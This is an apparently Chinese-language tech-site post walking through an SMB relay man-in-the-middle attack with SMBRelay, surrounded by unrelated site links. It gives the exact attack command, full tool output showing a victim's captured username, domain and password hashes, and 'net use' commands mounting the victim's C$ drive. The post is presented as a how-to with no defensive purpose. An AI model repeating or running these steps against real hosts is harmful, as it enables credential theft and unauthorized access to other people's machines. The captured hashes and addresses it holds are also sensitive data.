SMBRELAY终极应用
-
说明::这次攻击过程只需要2台机器,3个IP地址
关于协议与IP问题的说明:
我的IP是218.197.248.212,可是SMBRELAY无法运行在这个IP上,而且我只有把自己机器上“打印机与文件共享”服务删除后才能接受目标机器传来的HASH,218.197.248.154是一个不存在的IP地址,所以我把SMBRELAY绑在218.197.248.154上,测试的时候,实际上是
212(我自己)-----154(绑SMBRELAY的机器)----249(受害机器)
---------------------------------------------------------------------D:\>smbrelay.exe /IL 2 /IR 2 /L+ 218.197.248.154 /R- 218.197.248.154
SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack
Copyright 2001: Sir Dystic, Cult of the Dead Cow
Send complaints, ideas and donations to sirdystic@cultdeadcow.com
Using local adapter index 2: PCI Bus Master Adapter
Local IP address added to interface 2
Bound to port 139 on address 218.197.248.154
Connection from 202.114.28.249:1915
Request type: Session Request 72 bytes
Source name: VODSER <00>
Target name: *SMBSERVER <20>
Setting target name to source name and source name to <|>CDC4EVER<|>...
Response: Positive Session Response 4 bytes
Request type: Session Message 137 bytes
SMB_COM_NEGOTIATE
Response: Session Message 115 bytes
Challenge (8 bytes): 33C0E036880693BB
Request type: Session Message 290 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case insensitive password: FA31DD7DA7659D4DB6273B2AC9AF9FCCEA912F843B5A1874
Case sensitive password: E53DFF557C5E7C37FD34FB5FD959CC26DB335F4C2AB44585
Username: "UUSER_VODSER"
Domain: "VODSER"
OS: "Windows 2000 2195"
Lanman type: "Windows 2000 5.0"
???: ""
Response: Session Message 154 bytes
OS: "Windows 5.0"
Lanman type: "Windows 2000 LAN Manager"
Domain: "WORKGROUP"
Password hash written to disk
Connected?
Bound to port 139 on address 218.197.248.154 relaying for host VODSER 202.114.28
.249
--------------------------------------------------------------------------------
这时候,我已经抓到对方HASH了,下面是影射对方C盘
----------------------------------------
E:\>net use \\218.197.248.154
命令成功完成。
E:\>net use h: \\218.197.248.154\c$
命令成功完成。
----------------------------------------------------------------------------
第一屏的显示如下
---------------------------------------------------------
Connection rejected: 202.114.28.249 already connected
*** Relay connection for target VODSER received from 218.197.248.212:1615
*** Sent positive session response for relay target VODSER
*** Sent dialect selection response (5) for target VODSER
*** Sent SMB Session setup response for relay to VODSER
Termination requested...
Deleted incoming IP address
*** Relay disconnected from target VODSER
*** Target VODSER Disconnected
Exiting main
-------------------------------------------------------------------------
相关视频
相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么
- 文章评论
-
热门文章
360免费wifi电脑版怎么
有道云笔记怎么保存网
有道云笔记内容丢失怎
360免费wifi一直显示正
最新文章
微博热搜宝盒是什么 微
最新微信编辑器哪个好
百度网盘安全吗?百度网盘信息泄露怎么回事乐视云盘关闭怎么办 乐视云盘关闭怎么转移文百度云盘下载速度慢解决方法2017 百度云盘下百度网盘怎么用迅雷下载2017 百度网盘怎么用
人气排行 无线网络密码破解WPA/WPA2教程(包教包会)微信编辑器哪个好 3种实用微信编辑器推荐foxmail邮件存储位置在哪 foxmail7.2邮件存p2p种子搜索器用不了解决办法360免费wifi没有无线网卡怎么办百度云网盘中怎么添加好友 百度云网盘添加微信电脑版聊天记录保存在哪 微信电脑版文件360云盘上传速度慢怎么办 360云盘上传速度慢
查看所有1条评论>>